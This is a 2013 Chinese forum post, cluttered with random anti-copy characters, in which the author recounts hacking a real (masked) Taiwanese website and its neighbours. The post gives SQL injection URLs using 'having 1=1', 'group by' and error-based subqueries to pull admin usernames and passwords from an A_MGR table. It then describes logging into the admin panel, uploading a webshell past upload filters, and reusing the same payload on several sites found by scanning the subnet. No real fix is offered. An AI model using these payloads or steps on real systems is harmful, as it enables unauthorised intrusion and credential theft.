发现一个注入点4 f% g) G' A, M/ Q- n* O: G
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389+ |0 c6 `1 e1 W1 g1 R) \
( R, N, J$ C: P6 _
习惯性的加’having1=1--$ l( L# m' ]$ e+ ]( c) P$ N
) r& H( O) C W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) p3 e* c4 @# e. l7 p5 r! p6 d. y' O4 F! V" x& |, t4 |+ k
0. _0 |4 N; B" e
' N5 _1 D& W/ z
爆出Diary_A.dl_Title(这时候很激动啊)
d. Q& I& p q. x6 H- @# ?$ k! X5 [4 h5 q" a& F( N6 H
那么继续* v: A" b t+ V& ?+ t1 X
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—/ k( h9 [( F5 N7 H3 |$ T, Y" r
4 H7 g. S3 I' j继续,一直爆下去
3 T; Z* @ y B9 @3 l: D) c
8 ~. D; t6 M! L- ?6 b3 _' p- }爆到几个字段和表段 但是没找到需要的管理用户的字段# [1 v0 N0 [& ?
9 p$ ^8 B0 y6 R+ x* n6 o
蛋疼了 怎么办 然后去后台登陆页看源码- I0 @) _, Y. [4 P/ M- M% u% c
6 c p/ |, R- _7 s) r0 D Y
0
4 t& k) A L% B, l& ?8 [2 Y
3 g9 P' L" o- d9 s* p3 \Input name= “ADUID”) n$ ^* j; P- ^6 \6 s
Input name= “ADPWD”
0 R4 ]2 G( N3 r% ^+ B) b% ~, y0 B3 S' {" C1 d( @
很幸运 找到了字段那就继续1 o% w7 M/ P& |
找到之后开始爆用户" N. Q6 O4 a; d( M. M6 ]
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
: ~, u5 G4 m( A# U爆密码
) p( Q% V5 b# r V' [! o% X4 ?% Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—1 p2 P# P5 j* n8 [5 m
测试了下 这个注入点只能爆到文章哪里的表 , y) J) ?" z9 J! f7 v; E( }
. P3 }. c W2 a/ j头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
' Z) H3 @$ R1 u! c4 C7 Q* ~; @3 J" O3 l9 f& h r- z* W$ ^( B
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了 ~ B7 i( l( [
( z* b' o3 R, _5 _: b, K4739 r2 f6 w2 W0 `: K" _, o. \
1 f) h: T' f r) l' C' ~- ^4 X' @: ]
进后台0 K( y8 V0 A J N
/ i8 m# ? j6 r Y J
) h, f2 t# _3 U+ N7 G3 ?6 A
发现几个上传点 有的地方不能上传 而且防止恶意代码
1 ]. `) k) ~' J: E0 ^# v7 T( D' `8 v9 n; L0 s4 Z% _
没办法 各种百度各种找大牛 找到一只好像可以突破的马
0 i; a/ a5 W, [2 {( h& T4 M
5 h$ i. Z' D [# [; k; k. u3 D% |) i1 i2 }* n7 u
在系统管理那里直接上传 不过没有显示地址
3 g( l- }. v9 G" k6 J+ I& Q$ B& t+ y( i5 O( k' F# ~& @ s) T8 |
再上传一次 抓包 搞定OK
9 w: m& k# j6 a: i. G1 }, g8 X: u9 p) L% q
% P) s2 Q# Q. ?, p
! C7 A7 j3 g$ {- X. n# m
472
& f, I, v0 X* {# X) o* d
& ?' c7 _2 F3 D% p. V! e9 z' }晚上不行了 去睡觉。。。! a: y: f7 ~" C! B1 @. [4 O1 r
第二天刚起床 闲的没事做继续日站吧
0 i& ~& B; K3 n4 g1 K. W6 F% d: H# N
! v1 b+ Z, Y9 _+ H找个站 就把这个站的旁c扫了下5 b6 S" e, k* e# r
5 Y) Z L6 S" B发现c段也有一个购物站 ,然后还和这个站的模板差不多! p' h8 q5 a! P9 u% H# i8 c
% _0 A% ]) A! K! \4 V/ o! f) T就找到会员登录口测试6 W+ c* Q4 w, F: ?. c J( b
2 T# z4 p4 o) u9 e: p! g
'and (select top 1 MGR_UID from A_MGR)>0—: C/ N2 ?% k1 b) K, G, P' i2 m
果断爆到了 这时候我很激动 通杀
9 H4 p& t% S6 M
% G+ x( G$ e% f/ s# i2 j I再次翻c段7 x# [# S5 X( @% O/ {" Z+ S
" Q2 G$ T. N& y; ~7 M# U9 d7 o* a3 V翻出几个站 都成功拿下
" U- u0 D2 [0 P5 k2 h
- I6 R0 Q3 T8 x
8 m! P: w& a1 C( ]$ ~7 V5 r9 X8 n0 t" J+ ^8 L" y
修复方案:
1 k& y' M6 o, l0 L# k) Y( g `6 \: X5 q他们比我专业 6 u- Z, Y7 I: s1 M; K6 W: `
7 C+ H1 \5 e, S& }6 e. r: J
& n8 }0 I' ^, x' @; ]4 W# ?! r* k9 v
|
发表于 2013-4-4 17:40:38
收藏
支持
反对